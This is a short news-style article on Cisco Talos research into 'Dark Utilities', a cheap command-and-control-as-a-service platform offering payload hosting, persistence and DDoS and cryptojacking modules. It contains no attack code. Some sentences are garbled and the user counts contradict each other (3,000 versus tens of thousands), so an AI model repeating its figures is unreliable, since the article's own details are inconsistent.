A C2 server refers to the way attackers control their malware externally, sending commands, configurations, and new payloads, and receiving data collected from attacked systems.
“Dark Utilities” operates as a “C2-as-a-Service” that claims to provide a reliable, anonymous C2 infrastructure with all the necessary extras, starting at just €9.99.
A report from Cisco Talos said the service has around 3,000 active users, which will bring the operator around 30,000 euros in revenue.
Dark Utilities comes out in early 2022, providing full C2 capabilities on the Tor network and the Transparent Network, and hosting malware payloads in IPFS – a decentralized network system for storing and sharing data.
The one-stop malware service offered also supports multiple architectures, and the operator appears to be planning to expand the list to offer a larger selection of potentially targeted devices.
Choosing an operating system results in a command string that “threats typically embed in PowerShell or Bash scripts to facilitate retrieval and execution of malicious payloads on victim machines,” Cisco Talos researchers said.
The selected load is also passed inWindowsCreate a registry key on , or create a Crontab entry on Linux or a Systemd service that establishes a persistent presence on the target system.
According to the researchers, the client’s admin panel comes with multiple modules for various types of attacks, including distributed denial of service (DDoS) and cryptojacking.
With tens of thousands of threat actors already subscribed, and the low prices, Dark Utilities could attract more less-skilled adversaries.